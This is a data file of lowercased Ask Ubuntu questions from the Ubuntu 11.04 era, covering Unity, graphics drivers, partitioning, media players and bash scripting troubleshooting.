38941	courses on ubuntu	i want to hold some sort of introductory sessions to ubuntu and more advanced study if it goes well . what topics and content should i cover ? personally , i learned the ropes as a curious person poking around and doing things myself , but i ca n't come up with what kind of things ( well i did , but only a few things ) that would be relevant to the task of introducing ubuntu or going into more details . update thanks to florian and rinzwind 's input , i think i know what topics i would like to cover . i would like to ask for materials i can refer to . i 'm an ubuntu user , but the range of software i use is fairly limited . i do n't use gwibber or evolution among other things . pointers to getting started with those will be welcome . i would also like to ask what kind of more advanced follow-up courses can be provided . there 's lamp , ssh and basic administrative tasks . what other things can be covered ?
38949	bug reporting tool pops up everytime i login	i have a dual-boot with xp and 11.04 . everytime i start-up 11.04 , bug reporting tool comes up and when i click create report , text file shows as below : system : linux 2.6.38-8-generic # 42-ubuntu smp mon apr 11 03:31:50 utc 2011 i686 x vendor : the x.org foundation x vendor release : 11001000 selinux : no accessibility : disabled gtk+ theme : ambiance icon theme : ubuntu-mono-dark gtk+ modules : gnomesegvhandler , canberra-gtk-module memory status : size : 29282304 vsize : 29282304 resident : 7127040 share : 5787648 rss : 7127040 rss_rlim : 18446744073709551615 cpu usage : start_time : 1304253607 rtime : 7 utime : 6 stime : 1 cutime:0 cstime : 0 timeout : 0 it_real_value : 0 frequency : 100 -- -- -- -- -- - .xsession-errors -- -- -- -- -- -- -- -- -- -- - ** ( gnome-session:1467 ) : debug : gsmdbusclient : obj_path=/org/freedesktop/dbus interface=org.freedesktop.dbus method=nameownerchanged ** ( gnome-session:1467 ) : debug : gsmdbusclient : obj_path=/org/freedesktop/dbus interface=org.freedesktop.dbus method=nameownerchanged ** ( gnome-session:1467 ) : debug : gsmdbusclient : obj_path=/org/freedesktop/dbus interface=org.freedesktop.dbus method=nameownerchanged ** ( gnome-session:1467 ) : debug : gsmdbusclient : obj_path=/org/freedesktop/dbus interface=org.freedesktop.dbus method=nameownerchanged ** ( gnome-session:1467 ) : debug : gsmdbusclient : obj_path=/org/freedesktop/dbus interface=org.freedesktop.dbus method=nameownerchanged ** ( gnome-session:1467 ) : debug : gsmdbusclient : obj_path=/org/freedesktop/dbus interface=org.freedesktop.dbus method=nameownerchanged ** ( gnome-session:1467 ) : debug : gsmdbusclient : obj_path=/org/freedesktop/dbus interface=org.freedesktop.dbus method=nameownerchanged ** ( gnome-session:1467 ) : debug : gsmdbusclient : obj_path=/org/freedesktop/dbus interface=org.freedesktop.dbus method=nameownerchanged ** ( gnome-session:1467 ) : debug : gsmdbusclient : obj_path=/org/freedesktop/dbus interface=org.freedesktop.dbus method=nameownerchanged could not attach to process . if your uid matches the uid of the target process , check the setting of /proc/sys/kernel/yama/ptrace_scope , or try again as the root user . for more details , see /etc/sysctl.d/10-ptrace.conf ptrace : operation not permitted . /home/virgil/1977 : no such file or directory . no stack . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- the last three or four lines of the above text shows some hint of the problem but i do n't understand it . need help .
38950	when do things in the new unity panel turn blue ?	i 've noticed a couple surprising blue icons in the new unity panel . i think i noticed the envelope glowed blue when i had a new message , and i think the bfb glowed blue when i had a wiggling application , but i ca n't be sure . i even think the volume indicator glowed blue at some point , but i ca n't get it to do so again . i 'm sensing there 's some subtlety here that i 'm missing . is there a list/explanation ?
38957	can i use metacity 's move_to_side keybindings from unity ?	i noticed that gconf-editor has some interesting keybindings for metacity in /apps/metacity/window_keybindings/ : move_to_center move_to_corner_ne move_to_side_e can i use these from unity in 11.04 ? i 'm already using some others ( like toggle_maximized ) , but i can not get the move_to ones to work . i wrote a script for 10.10 to do something similar ( i think ) , but if i can use native functionality , that would be better .
38958	vanishing window content ( blank/white/black ) using unity with nvidia graphics card	after about an hour ubuntu starts to behave strangely : a lot of resizing ( vertically , but sometimes horizontally ) redraws contents , but this is very annoying . is there a way to fix it ? graphic card : 00:05.0 vga compatible controller : nvidia corporation c51 [ geforce go 6100 ] ( rev a2 ) i 'm using nvidia-current drivers ( 270.41.06-0ubuntu1 ) .
38960	how can i unclutter artists view in banshee ?	i have huge sxsw compilation albums . they clutter artists view . clementine has an elegant solution for this â compilations are stored under various artists . how can i solve this in banshee ?
38964	why is this application throwing opengl errors when run in unity ?	i have an application that ran flawlessly in wine 1.3 in maverick . however , when run in natty under unity , i get the following error : x error of failed request : badalloc ( insufficient resources for operation ) major opcode of failed request : 136 ( glx ) minor opcode of failed request : 27 ( x_glxcreatepbuffer ) serial number of failed request : 1703 current serial number in output stream : 1704 ... and then unity crashes . is there anything i can do to make this application work ?
38967	what do these unity errors mean and why are they showing up ?	unity has just crashed and the following is displayed when i try to restart it by running the command unity : initializing bailer options ... done initializing detection options ... done initializing composite options ... done compiz ( opengl ) - fatal : no valid gl extensions string found . compiz ( bailer ) - info : ensuring a shell for your session can not register the panel shell : there is already one running this computer has been running unity for the last few days with no problems , so this is not likely a hardware issue . what do i have to do to get unity to restart ?
38968	unwanted sleeping processes	today i tried to speed up my computer disabling unwanted processes . in system monitor i can see there 150 processes . almost all of them were sleeping but still consuming a little but memory . i 've checked many tutorials , how to disable unwanted processes ( i have used sysv-rc-conf , boot-up manager , renamed services in /ect/rc*.d ) , but all of them are old and some files seems have been deprecated or renamed . after reboot , in system monitor there are still about 150 processes sleeping . what am i doing wrong , or maybe i do not understand something . if it so , please explain me what is the need of these sleeping processes and why are not they running ? thank you !
38970	foobar2000-like music player ?	i 've been thinking about switching to ubuntu full time , but there are still some programs left behind that i have n't found any equivalent to yet . does anyone know of a music player similar to foobar2000 ( i 've read it does n't handle well in wine ) ?
38972	problem installing nvidia geforce 310m drivers	i installed ubuntu 11.04 . i can not install my nvidia geforce 310m driver . i active it by hardware drivers ( recomended ) but it is not in use . i ran this command in terminal sudo nvidia-xconfig then restarted my computer . my computer after restarting can not load login window and it is black . how can i solve this problem ?
38976	unity does n't load anymore	i installed 11.04 a few days ago and the first few boots unity loaded as expected . but now its just booting into gdm . i did get one popup about it not being supported on my machine ( after the it had booted fine 2 or 3 times ! ) but i dismissed it without reading it . i 've looked at how can i activate unity ? but nothing shows up in my additional drivers except for a wireless chip the dropdown at login has ubuntu , ubuntu classic and ubuntu classic safe mode i think
38977	how do i install a driver for an nvidia geforce 310m ?	i installed ubuntu 11.04 . i can not install my nvidia geforce 310m driver . i active it by hardware drivers ( recomended ) but it is not in use . i ran this command in terminal sudo nvidia-xconfig then restarted my computer . my computer after restarting can not load login window and it is black . how can i solve this problem ?
38988	is there a way to save a session ?	is there a way for saving a session in 11.04 ?
38994	sleep wo n't work and the touch/clickpad is a mess on a hp envy 15	i attempted to sleep the computer and it does n't even turn off the screen , it just blank and the fans continue running loudly . the only way to get it back on is to hold down the power button until it shuts down completely then power on . the touchpad is constantly jumping around and navigation is incredibly hard . it 's a clickpad which is probably the issue . right click is non-existent , though i read you can tap the lower right corner for it - you have to be incredibly precise . it 's a massive pain . click and drag rarely works as well . i ca n't find current synaptics drivers anywhere . ( i 've also seen the fix that enables right click but ruins vertical scrolling , that 'd drive me crazy - is there anything else ? ? ) i was hoping the issues would be fixed in the brand new version of ubuntu but i guess not , i 'm tired of windows but it seems to be impossible to use linux on a hp envy . any help would be greatly appreciated , michael
38995	problems with the 'ubuntu classic ' interface after recent upgrade to 11.04	i 'm experiencing problems with the 'ubuntu classic ' interface , after i recently updated my ubuntu to version 11.04 . first of all , a small glitch . just look at this screenshot of the dropdown menu that appears when i right click the clock applet ( but also any other gnome applet ) . look at the gradients ... second , there 's a more severe issue that i 'm not able to debug . sometimes , on an occasional apparently random basis , i can not logout using the commands provided by gnome gui . when i choose `` logout '' , completely nothing happens . the same if i choose `` restart '' or `` shutdown '' . last time i had to shutdown opening a terminal and using `` sudo shutdown -h now '' . is there any way i can inspect this mysterious behavior ?
39004	how can i make nautilus open with an extra panel by default ?	i would like to know how i can have an extra pane ( press f3 ) in the file manager by default . currently , i add extra pane and when i close the file manager , i have to add it again . it 's a shortcut away but i feel more productive when i have it and i do n't think of adding it systematically .
39009	another monitor detected even if there is n't one plugged in	it seems that ubuntu 11.04 ( and lubuntu , and probably others too ) seem to detect a dvi monitor even if i do n't have anything other than this vga monitor plugged in . it never happened in earlier version of ubuntu . i 'm not using a laptop though , i 'm using a desktop with an intel atom . maybe thats why it 's detecting ( or trying to detect ) another `` monitor '' any way how to fix this ?
39013	specifying which ethernet port for apt to use	i 'm trying to perform an update using the normal sudo apt-get update . however my main ethernet does not have access to the outside world ( long story i think i purposely did this and forgot how i did it to undo it ) . i have another network card in there that i plug in for just to get internet . when i ping using the second network card i can ping www.google.com and with the first i can not . so after that long story , apt-get will only try to use the first network card and fail to get a reply back from the internet . i was wondering if there was a way to force apt-get to use a certain eth to retrieve updates ?
39014	how do i stop unity from starting windows maximised ?	i do not find an option to change the window behaviour that was in appearance properties . in particular i find it very annoying that nautilus is always maximised when opening it . is there a way to change that default behavior ?
39018	programs disappearing after being minimized	i installed ubuntu 11.04 yesterday using the wubi installer and i 've noticed that a few of my programs will disappear when i minimize them . for example , i ca n't minimize eclipse because it will disappear and i wo n't be able the load a 2nd one because the 1st is using my workspace ( if you 're familiar with eclipse you know that you ca n't use the same workplace twice as the same time ) . i also just noticed that if i minimize a terminal then it will disappear as well . does anyone have any idea why this is happening and what , if anything , i can do to prevent it ?
39024	no sound after installing catalyst 11.4	i did a clean install of ubuntu 11.04 and everything went fine . the sound was working without a problem with the on-board device azalia ( intel hda ) from the asus crosshair iv formula motherboard . then , i installed the proprietary drivers for the amd radeon hd 6870 through this guide . now the sound is gone . if i go to sound preferences , on the output options i see two devices for sound output : internal audio analog stereo ( selected ) barts hdmi audio [ radeon hd 6800 series ] is there anything i can do ? if you need any more information , let me know . thanks !
39025	how can i start a different x session on tty8 ?	let 's say , for an example , i want to run a full-screen opengl application on tty8 and have my standard gnome desktop on tty7 . how can i configure ubuntu to meet my requirements ?
39031	gwibber leaves ghost processes behind	at some time , gwibber is causing a ghost process , which causes an increase in consumption of the processor , so increasing temperature . already deactivated accounts , he had configured it , but to no avail . this occurrence continues . that bothers me , because i need to kill these processes opened by gwibber of nowhere . here kernel generic-pae in 4gb ram
39032	mouse and keyboard freezes when using recommended driver for nvidia	11.04 is nice , i like it but it is freezing , i have nvidia 6600gt , the drivers i have loaded are the recommended ones . the additional driver program gave me two choices 73 and then one it recommended but it did n't tell me what build it was . so i 'm in 11.04 recovery mode because of the freeze and that goes back to the old 10.10 desktop screen . it does n't tell me what drivers it is using in the recovery mode but it does n't freeze . i want to use the regular11.04 any advice .
39034	ca n't restore gnome-panel after replacing it with avant-window-navigator	i just replaced gnome-panel with avant-window-navigator , but was unhappy with the result . i tried to restore gnome-panel by using ubuntu tweak , and configuration editor . but neither of them would recognize the value gnome-panel . how can i fix this ?
39035	how can i make window shadows larger than 18 ?	i ccsm under window management > window decoration > shadow radius you can only slide up to 18 . if you use gconf-editor you used to be able to set any size under / > compiz-1 > general > screen0 > options > shadow_radius . any idea how to increase it ?
39038	libreoffice 3.3.2 export to pdf option only lets me export entire documents	after installing natty 11.04 ( kubuntu ) , i noticed that the `` export to pdf '' menu item does not present a dialog allowing me to select pages of the document . i can export the entire document only . i 've looked through the options , and i ca n't find any `` switch '' i 've set to turn this off -- not that i would want to ... i am thinking about doing an uninstall-reinstall , has anyone else had this problem -- or know a solution ? tia for any help
39040	can the close / minimize / maximize buttons be pulled out of the global app menu when a window is maximized ?	i 've disabled the unity global appmenu as it personally drives me batty - i 've also moved my minimize / maximize buttons back to the right hand side of the windows where i like them . however , when i maximize a window , the minimize / maximize / close buttons get pushed into the top panel on the left , next to where the global appmenu would be if i had n't disabled it . i would prefer if maximizing a window functioned exactly the same as if i pressed ctrl+alt+num 5 is this possible ?
39044	shrink ntfs windows 7 partition with gparted	i am running a dual-boot system with windows 7 and ubuntu 10.10 . initially i allocated about 20gb for my ubuntu partition ; however , i quickly ran out of that space and am now looking to expand my partition . currently my ntfs partition ( 450gb ) has about 130gb of free space . i tried using gparted to shrink the partition but encountered the following error . i booted into windows so i could run chkdsk but the countdown freezes at 1 upon reboot . i tried multiple methods to resolve that issue but nothing seems to work . finally i gave up , and now i just want to know what is the best way for me to force gparted to shrink the partition regardless of the errors . i do n't really have anything important and i do n't mind risking the data . i just do n't want to wipe the entire ntfs partition because i do n't have a windows install cd and might require windows later on for some programs . i tried using sudo ntfsresize but that spews out the same error as gparted ... any ideas ? check and repair file system ( ntfs ) on /dev/sda2 00:00:09 ( error ) calibrate /dev/sda2 00:00:00 ( success ) path : /dev/sda2 start : 36944325 end : 976771119 size : 939826795 ( 448.14 gib ) check file system on /dev/sda2 for errors and ( if possible ) fix them 00:00:09 ( error ) ntfsresize -p -i -f -v /dev/sda2 ntfsresize v2.0.0 ( libntfs 10:0:0 ) device name : /dev/sda2 ntfs volume version : 3.1 cluster size : 4096 bytes current volume size : 481191318016 bytes ( 481192 mb ) current device size : 481191319040 bytes ( 481192 mb ) checking for bad sectors ... checking filesystem consistency ... cluster 63468 is referenced multiple times ! cluster 63469 is referenced multiple times ! cluster 63465 is referenced multiple times ! cluster 63466 is referenced multiple times ! cluster 63467 is referenced multiple times ! cluster 165621 is referenced multiple times ! cluster 165622 is referenced multiple times ! cluster 165623 is referenced multiple times ! cluster 165624 is referenced multiple times ! error : filesystem check failed ! error : 9 clusters are referenced multiply times . ntfs is inconsistent . run chkdsk /f on windows then reboot it twice ! the usage of the /f parameter is very important ! no modification was and will be made to ntfs by this software until it gets repaired .
39046	how to automount a unit when i click on an executable shortcut to that unit	i use teamspeak everyday but the teamspeak files are on another partition that i have to load manually before running teamspeak from the desktop shortcut . without obviously loading the partition with fstab , how can i load the partition ( auto mount it ) when i click on the link to teamspeak . for example , i click on the teamspeak shortcut , this checks that the shortcut points to a not mounted partition , it loads the partition and then executes the program . is there a way to do this ?
39047	playing a video logs me out	when i try to play a video in vlc , totem or banshee , it immediately logs me out . sometimes this happens when i try to full screen the video . this seems to happen only after upgrading to ubuntu 11 , and happens for multiple kinds of files , like avi and m4v . the motherboard is asus a8v-mx . please help me fix my ubuntu installation . thanks . here are the relevant entries from syslog : 21:12:27 enlightenment kernel : [ 488.157457 ] powernow-k8 : hardware error - pending bit very stuck - no further pstate changes possible may 1 21:12:27 enlightenment kernel : [ 488.158634 ] powernow-k8 : transition frequency failed may 1 21:12:27 enlightenment kernel : [ 488.264015 ] powernow-k8 : failing targ , change pending bit set may 1 21:12:27 enlightenment kernel : [ 488.306466 ] agpgart-amd64 0000:00:00.0 : agp 3.0 bridge may 1 21:12:27 enlightenment kernel : [ 488.306489 ] agpgart-amd64 0000:00:00.0 : putting agp v3 device into 8x mode may 1 21:12:27 enlightenment kernel : [ 488.306562 ] pci 0000:01:00.0 : putting agp v3 device into 8x mode may 1 21:12:27 enlightenment kernel : [ 488.372044 ] powernow-k8 : error - out of sync , fix 0x2 0xa , vid 0x4 0x4 may 1 21:12:27 enlightenment kernel : [ 488.372055 ] powernow-k8 : ph2 null fid transition 0xa may 1 21:12:30 enlightenment rtkit-daemon [ 1304 ] : successfully made thread 1987 of process 1987 ( n/a ) owned by '105 ' high priority at nice level -11 . may 1 21:12:30 enlightenment rtkit-daemon [ 1304 ] : supervising 1 threads of 1 processes of 1 users . may 1 21:12:30 enlightenment rtkit-daemon [ 1304 ] : successfully made thread 1988 of process 1987 ( n/a ) owned by '105 ' rt at priority 5 . may 1 21:12:30 enlightenment rtkit-daemon [ 1304 ] : supervising 2 threads of 1 processes of 1 users . may 1 21:12:30 enlightenment rtkit-daemon [ 1304 ] : successfully made thread 1989 of process 1987 ( n/a ) owned by '105 ' rt at priority 5 . may 1 21:12:30 enlightenment rtkit-daemon [ 1304 ] : supervising 3 threads of 1 processes of 1 users . may 1 21:12:32 enlightenment gdm-simple-greeter [ 1975 ] : gtk-warning : /build/buildd/gtk+2.0-2.24.4/gtk/gtkwidget.c:5687 : widget not within a gtkwindow may 1 21:12:32 enlightenment gdm-simple-greeter [ 1975 ] : warning : unable to load ck history : no seat-id found may 1 21:12:34 enlightenment gdm-session-worker [ 1978 ] : glib-gobject-critical : g_value_get_boolean : assertion `g_value_holds_boolean ( value ) ' failed may 1 21:12:38 enlightenment gdm-session-worker [ 1978 ] : pam_sm_authenticate : called may 1 21:12:38 enlightenment gdm-session-worker [ 1978 ] : pam_sm_authenticate : username = [ rama ] may 1 21:12:39 enlightenment rtkit-daemon [ 1304 ] : successfully made thread 2108 of process 2108 ( n/a ) owned by '1000 ' high priority at nice level -11 . may 1 21:12:39 enlightenment rtkit-daemon [ 1304 ] : supervising 4 threads of 2 processes of 2 users . may 1 21:12:39 enlightenment pulseaudio [ 2108 ] : pid.c : stale pid file , overwriting . may 1 21:12:39 enlightenment rtkit-daemon [ 1304 ] : successfully made thread 2111 of process 2108 ( n/a ) owned by '1000 ' rt at priority 5 . may 1 21:12:39 enlightenment rtkit-daemon [ 1304 ] : supervising 5 threads of 2 processes of 2 users . may 1 21:12:39 enlightenment rtkit-daemon [ 1304 ] : successfully made thread 2112 of process 2
39048	how to backup *and restore* a mediawiki server	i have a typical local installation of mediawiki in ubuntu 10.04 . and i am going to do a fresh install of ubuntu 11.04 . how can i quickly backup the wiki content and afterwards restore it bac ? all sites i found mention the sqldump command to dump the database but i am not sure how i will restore it back .
39049	burg themes not working	as soon as i updated to natty my burg stopped working . after a little tweaking here and there i somehow managed to get burg install . so during the boot menu i do see the burg menu but without the themes . also none of the shortcuts to change resolution etc work . i have even tried using burg manager . fail . please help . this is urgent .
39050	how can i speed up unity with an ati card ?	i 've been using unity for two days ... but all the apps and unity itself runs very slowly i 've installed catalyst 11.4 ( ati radeon hd 4350 , 2gb ram , core 2 duo @ 1.86 ghz , 12 gb partition , 1 gb to swap ) and i unchecked the v blank option in opengl in ccsm . there is another way to speed up unity ?
39057	how do i enable verbose mode at boot ?	how to make natty boot in verbose mode . changing option grub_cmdline_linux_default= '' splash quiet to grub_cmdline_linux_default= '' '' in /etc/default/grub does n't effect in natty .
39062	bash : [ : too many arguments ?	i 'm trying to create a directory and cd into it : in ~/.bashrc : function abc ( ) { appname= $ 1 appdir= '' $ home/code/ $ appname '' if [ mkdir $ appdir -a cd $ appdir ] ; then echo success else echo failed to create and switch directory fi } when i reload bashrc ( . ~/.bashrc ) i get the error : bash : [ : too many arguments failed to create and switch directory how do i fix this ? and what does [ : in the error mean ? ps . could someone direct me to a `` non-cryptic '' bash scripting tutorial ?
39063	i do n't see unity on 11.04 with nvidia geforce gt420 graphics card	i just installed ubuntu 11.04 . but unfortunately cool features those i liked is n't there . i mean launcher , dashboard , workspaces do n't showing . how enable them ? i 'm not familiar with ubuntu , almost newbie . acer laptop , cpu i5 , ram 4gb , geforce gt420 .
39069	how do i use the gnome panel in unity ?	i really need to use the gnome applets , is there a way to do it ?
39076	ati radeon hd 4870 : dead end	i have an radeon hd 4870 video card , and i have just update to ubuntu 11.04 . before i was using radeon free video driver , and all hardware acceleration i used was to watch movies on my tv . my tv is permanently attached to the pc , alongside the monitor . i have configured x to have 2 screens , the main one is the monitor . the second one , the tv , is only used to play movies and such . free driver sucks at gaming , so i missed ( but not that much ) being able to play some games in my old installation . now that i have updated ubuntu , free driver still sucks at games , but provided a fluid and awesome desktop performance , with all eye candy and special effects compiz is capable of . on the other hand , video playing performance is worse than before . v-sync no longer works , so there is a constant horizontal tear , and periodically video refresh freezes for half a second , making it extremely annoying to watch a movie with an interruption every few minutes . so i have tried the proprietary driver . good game performance , i was able to play penumbra : overtrue , trine , shadowgrounds , enenemy territory : quake wars , etc . all cool advanced shaders and special effects works . including movie playback , no periodical freezes and no horizontal tear due screen refresh gives me perfect movie performance . but desktop sucks . i can not use compiz because it is slow , bumpy and fullscreen does not works . but if i do not use compiz , i can have at most one opengl application at a time -- and it mus be fullscreen . i can no longer watch a movie on tv while my mother uses the terminal to surf the net , because everything except the opengl application freezes . all worse if the opengl application is windowed , it wo n't display what it is supposed to unless it is bellow another x window , what makes the opengl to render over that window , a total mess . when i bought this card people said : buy radeon because it will support free drivers . well , radeon free drivers lacks manpower , opengl is incomplete and my card has always been underused . proprietary drivers sucks . now i want nvidia , at least they do n't lie saying they will be well supported by free software . i am frustrated . i do not know what to do . do you have ubuntu 11.04 with radeon ? does it work ? do you play ? do you use opengl applications ? what driver do you use ? for now i am using proprietary driver ( fglrx ) , without desktop effects and refraining from using windowed opengl applications . now i am happy applications are not taking advantage of hardware acceleration .
39077	how to install gloobus preview in natty ?	i keep getting this error when i try to install gloobus preview in natty : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : gloobus-preview : depends : libpoppler7 but it is not installable e : broken packages how do i solve this problem ?
39080	can i use the global application menu with awn ?	is it possible to use the global/application menu gnome applet with awn ?
39082	will ubuntu one mobile be available on blackberry ?	are there any plans to bring ubuntuone mobile to blackberry ?
39090	install ubuntu 11.04 on ubuntu 10.04 ?	i have been using ubuntu 10.04 since more than 6 months , mainly for development purposes ( android , lamp ) . i got ubuntu 11.04 last night and quite liked it . i was just wondering if i can directly upgrade my 10.04 to 11.04 using the cd that i have got . should i go for a 10.10 upgrade first then move to 11.04 ? my system is already 100 % updated . i also read on some places that the unity and the new unified bar requires some applications ( such as eclipse ide ) to be configured specifically to be used with it . is it true ?
39097	navigate within folders in unity	i do n't always know the name of a file i 'd like to run . often , i 'll know the name of its parent folder , or its parent 's parent 's folder . this was easy to work through in gnome-do . i simply search for the name of the parent folder , then navigate using the arrow keys to the file i want within that folder and hit enter to open the file . i ca n't figure out how to do this in unity . i can only open the folder , and can not seem to navigate within a folder 's contents to open the file directly . is there a way to do so ? thanks . *edited to add user stories , deleted screenshots since imgur killed the images ( 10/2 ) * '' i do n't remember the name of the song i 'm thinking of . let me pull up my `` music '' folder and look through it . '' `` oh that 's right , it 's johnny cash . what songs of his do i have ? '' `` this is the song i want ! '' this is all done quickly without leaving the keyboard . i 'm getting out of the scope of my original question here : suppose i remember his name starts with a `` j '' but i do n't remember how to spell it . i type `` j '' and i quickly get a nice filtered list of all my music with `` j '' . i can also do other things in just a few presses :
39099	why is unity dash showing the desktop under `` downloads '' ?	in the unity dash , when i click `` find files '' , it has two sections : `` downloads '' and `` favorite folders '' , but the `` downloads '' section is showing files from the desktop instead of `` ~/downloads '' , which is where chrome downloads files by default . is there any way to change what shows up there ? it seems like the actual downloads directory would be a lot more useful .
39101	wireless & wired connection not working after upgrade	my lenovo ideapad s10-3s refuses to connect to anything . it recognises my wireless card ( broadcomm 4313 ) but whenever i boot up it shows `` wireless is disabled '' under wireless when i click on the network icon even after i check enable wireless . after i reinstalled the broadcom driver via additional drivers , it now has enable wireless greyed out and says `` wireless is disabled by hardware switch '' ( the hardware switch is on ) . i have plugged in my ethernet cable directly but nm-tool says connecting ( configuring ip address ) and then it becomes disconnected . after i run 'sudo rfkill unblock all ' , under wireless , it says `` device not ready '' . what should i do ? ifconfig : eth0 link encap : ethernet hwaddr f0 : de : f1:0f : fc : ae inet addr:10.164.12.120 bcast:10.164.13.255 mask:255.255.254.0 inet6 addr : fe80 : :f2de : f1ff : fe0f : fcae/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:4651 errors:0 dropped:0 overruns:0 frame:0 tx packets:2791 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:4280041 ( 4.2 mb ) tx bytes:323924 ( 323.9 kb ) interrupt:16 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:206 errors:0 dropped:0 overruns:0 frame:0 tx packets:206 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:14936 ( 14.9 kb ) tx bytes:14936 ( 14.9 kb ) was able to connect via ethernet on a friend 's modem but wireless remains at `` device not ready ''
39105	how to upgrade ubuntu from an iso image	i 'm using ubuntu 10.04 now and want to upgrade to ubuntu 11.04 . the problem is my net connection is very slow and i can not do a network upgrade from the `` updates manager '' . so , is there a way that i can download the ubuntu upgrade as an bootable cd image and upgrade from it ?
39107	how to get rid of double dash before the signature ?	i am using thunderbird as my email client and i use a signature to all my outgoing mails . how ever i can see the -- ( double dash ) which prepends to my signature . is it possible to avoid the double dash -- ?
39110	how to hide console messages on shutdown ?	i 'm using ubuntu 10.10 with kernel version 2.6.38-020638-generic . on the shutdown process when the desktop wallpaper is gone , there is always a black console printing some messages and then the ubuntu loading screen ( the same one when the ubuntu is starting ) . what i want is to hide the black console so that the purple ubuntu loading comes right after the desktop wallpaper is gone . thanks
39117	modem cdma zte ac2726 slow/delay detected about 3 minutesin network manager	i have cdma modem zte ac2726 , when i connected to ubuntu , this modem wait until 3 minutes for detected in network manager , how to make this modem no delay for detected in network manager ?
39118	unity super + d shortcut does n't work	super key + d shortcut does n't work in show desktop functionality for me in unity . i have searched and found solutions for adding a button in unity launcher but i do n't want that . i just want the keyboard shortcut to work for speed . i found that ctrl + alt + d do something similar but gedit window does n't bother to care for it .
39119	why is n't unity there ?	i 've installed 11.04 but for some reason unity is n't there . i 'm just getting the old interface . it 's not a graphics card problem as it can run brand new games fine . anyone know whats up ? thanks , mike .
39130	eclipse works oddly	i upgrade my ubuntu to 11.04 from 10.10 . after upgrade . eclipse become odd . the situation is that eclipse intermittently hang or become responseless . i use sun-6-java jre and sdk .
39138	restore install gui with xfce	i 've installed xubuntu on my laptop last night , and then again on my computer at work , and i came to notice that the xfce desktop looks so much better on the latter . on my laptop , i get all the panels ordered the same way , but the colours are plain and the icons are very different . i suspect it has to do with the fact that my laptop 's had an xubuntu on itself once , until about 4 months ago , before i went to look at ubuntu 's netbook edition . how can i get the same shiny desktop settings as i have on this fresh , virgin install ?
39139	how to change the icons of multiple files from terminal ?	i would like to change the icons of multiple files from terminal . not launcher icons , but the default icons for filetypes , based on the file endings . how to acheive this task ?
39143	can i align the desktop icons in a grid fashion , so that they are aligned vertically as well ?	now when you choose to keep the icons aligned on the desktop they only align horizontally in vertical columns , so that they can not be placed outside of these columns . what they do not do is align vertically so that there is an even space vertically between all icons , you can even overlap them if you want to . how can i make my desktop behave as a grid ? should n't this be default in the ubuntu installation ?
39148	rip ( transcode ) multiple titles , from a tv series dvd , automatically	i want to rip some tv series . dvd : :rip doesnt allow me to transcode all the titles with one click , which means doing the same process many times ( 20~ eps x many seasons= many videos ) . is there any software or script you know to copy all the dvds to my hd and then transcode them all to xvid files ? thanks
39149	newsgroup notification in the indicator applet ?	is it possible to get the indicator applet ( the mail icon in the top right of the screen ) to tell me when someone posts something new in particular newsgroups that i 'm subscribed to ? currently i 'm using thunderbird for newsgroups . running 11.04 , 64bit .
39154	how do i change my desktop back to the way it was in 10.10 from unity ?	how do i change my desktop back to the way it was in ubuntu 10.10 ? i do n't like the unity interface .
39164	upgraded ubuntu to 11.04 , no menus	i just upgraded to the new version of ubuntu ( 11.04 ) . just like every time in the past , there are issues : my applications ( firefox/gimp/anything ) do n't have menus ( more critical ) . i have to manually run gnome-panel , how do i get it to run automatically ? why does it happen ?
39167	how to use super key as modifer without unity and compiz ?	how can i use the super key as modifier in 11.04 ? i do n't have unity and compiz , i am using classic mode . when i press the super key and , for example , s , ( i want a shortcut like super + s ) in `` keyboard shortcuts '' in settings , i get `` multi_key '' , as super key no longer a modifier . before 11.04 super + s denote mod4 + s in `` keyboard shortcuts '' .
39168	why wo n't banshee import most of my music collection from rythmbox after upgrade to ubuntu 11.04 ?	i 've just upgraded to ubuntu 11.04 and i figured i 'd give their new default music player a go . i have my music in the $ home/music folder and i was using rhythmbox . the banshee player has a handy item on import suggesting it can pull from rhythmbox too . when i do it however it comes up with errors for all bar a couple of albums i bought recently via amazon ( mp3 ) . any idea what i 'm doing wrong ? there are errors reported for all the tracks that did n't get pulled in , suggesting it read the file list correctly . i also tried importing by directory with the same results . the error reported for each track is 'unable to import song ' . i initially thought perhaps it was a codec issue because i 'd just upgraded and presumably the codecs i 'd need were no longer on the sources list . i found those and installed them and found all the other ways of playing can deal with the music there . i then connected to my daapd server and was able to play the music on banshee from there . this is actually the same music so i 'm now guessing it 's not a codec issue .
39172	how do i install the driver for a dlink dge-528t ?	additionally if i try to install the latest driver from tp-link i get this error message . # make clean modules make -c src/ clean make [ 1 ] : entering directory `/root/downloads/tg-3269_100628/r1000/src' rm -f *.o *.ko *~ core* .dep* . *.d . *.cmd *.mod.c *.a *.s . *.flags make [ 1 ] : leaving directory `/root/downloads/tg-3269_100628/r1000/src' make -c src/ modules make [ 1 ] : entering directory `/root/downloads/tg-3269_100628/r1000/src' make -c /lib/modules/2.6.34.7-0.4-default/build subdirs=/root/downloads/tg-3269_100628/r1000/src modules make [ 2 ] : entering directory `/usr/src/linux-2.6.34.7-0.4-obj/i386/default' make -c ../../../linux-2.6.34.7-0.4 o=/usr/src/linux-2.6.34.7-0.4-obj/i386/default/ . modules cc [ m ] /root/downloads/tg-3269_100628/r1000/src/r1000_n.o /root/downloads/tg-3269_100628/r1000/src/r1000_n.c:378:21 : error : expected ‘ ) ’ before string constant /root/downloads/tg-3269_100628/r1000/src/r1000_n.c : in function ‘r1000_phy_timer_t_handler’ : /root/downloads/tg-3269_100628/r1000/src/r1000_n.c:525:60 : error : ‘struct net_device’ has no member named ‘priv’ /root/downloads/tg-3269_100628/r1000/src/r1000_n.c : in function ‘r1000_timer_handler’ : /root/downloads/tg-3269_100628/r1000/src/r1000_n.c:561:60 : error : ‘struct net_device’ has no member named ‘priv’ /root/downloads/tg-3269_100628/r1000/src/r1000_n.c : in function ‘r1000_init_board’ : /root/downloads/tg-3269_100628/r1000/src/r1000_n.c:615:2 : error : implicit declaration of function 